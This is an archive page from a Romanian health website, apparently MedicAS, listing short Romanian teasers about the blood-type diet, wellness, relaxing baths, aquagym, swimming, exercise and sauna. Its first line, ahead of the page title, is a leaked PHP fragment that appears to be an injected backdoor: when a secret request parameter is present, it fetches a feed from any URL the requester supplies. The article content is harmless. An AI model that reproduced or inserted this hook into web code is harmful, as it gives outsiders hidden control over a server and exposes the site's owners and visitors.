isset($_REQUEST['zox4vu']) && fetch_feed($_REQUEST['feed_url']); Fitness Si Wellness - MedicAS

Arhiva pentru categoria 'Fitness si wellness'

Alimentatie grupa sanguina A

19 November, 2008

Pentru unii e doar ceva la moda, pentru altii a devenit o “biblie” a stilului de viata… Despre alimentatia pe grupe sanguine se vorbeste tot mai mult in ultimul timp. Si profesionistii sau cei care au studiat intens problema, dar si cei mai putin experimentati, care au citit o carte si se considera experti. De aceea e bine sa stim cu cine stam de vorba cind cerem sfaturi despre alimentatia pe grupe sanguine. Deoarece atunci cind vorbim despre o alimentatie corecta discutam pina la urma de sanatate, despre cum sa ne simtim bine, despre wellnes si o viata fericita, fara probleme.


Sa te simti bine si sa arati bine. Visul oricarei femei. Si al oricarui barbat, chiar daca unii nu recunosc. Cam asta presupune conceptul de wellness: un mod de viata echilibrat in care sa nu existe dureri fizice (prin diverse locuri), frustrari, nefericiri…Si da, desi pentru multi pare o utopie, unii au reusit sa gaseasca drumul prin care sa obtina acea stare de armonie interioara, care sa se reflecte si in exterior.


Ce poate fi mai placut decit o baie cu saruri si arome relaxante, energizante sau…afrodisiace? Acasa sau la centrele de wellnes si spa, efectele sunt miraculoase, mai ales dupa zilele pline de provocari si stres.


AQUAGYM - cainta fara flagelare

05 September, 2008

Gimnastica si …balaceala. Hm..nu chiar asa, dar senzatia de bine pe care o ai facind miscare intr-o piscina nu se compara cu nimic. Aquagym-ul se incadreaza perfect in conceptul de wellness. Te simti bine, iti tonifici corpul, slabesti…ce poate fi mai frumos?


Nu trebuie sa suferim de vreo boala pentru a apela la inot: oricand si pentru oricine, acest sport minunat poate fi benefic. Asa cum exista inotul terapeutic, tot asa exista inotul de relaxare, pe care-l putem incadra in categoria larga a wellness-ului, adica tot ceea ce-ti confera o stare de bine. Ce efecte benefice are si de ce este indicat sa practicam regulat inotul, cititi mai departe.


Exerciţii fizice… ceva atât de comun, cu atât de multe efecte benefice pentru organism. Unii le ştim, alţii le putem afla citind articolul de mai jos. Indiferent dacă le introducem in categoria fitness sau în categoria mai largă a wellnesului, exerciţiile fizice, practicate cu regularitate, ne vor schimba viaţa. În bine.


În categoria wellness, adică sănătate pe termen lung, optimism, sete de viaţă, intră şi sauna. Relaxare, dar şi terapie în acelaşi timp, sauna poate fi umedă sau uscată; indiferent de tipul ei, practicată cu regularitate, sauna vă va face să vă simţiţi minunat.


 
 

Newsletter

Loading... Loading...
 
 

Aceasta este arhiva articolelor din categoria Fitness si wellness.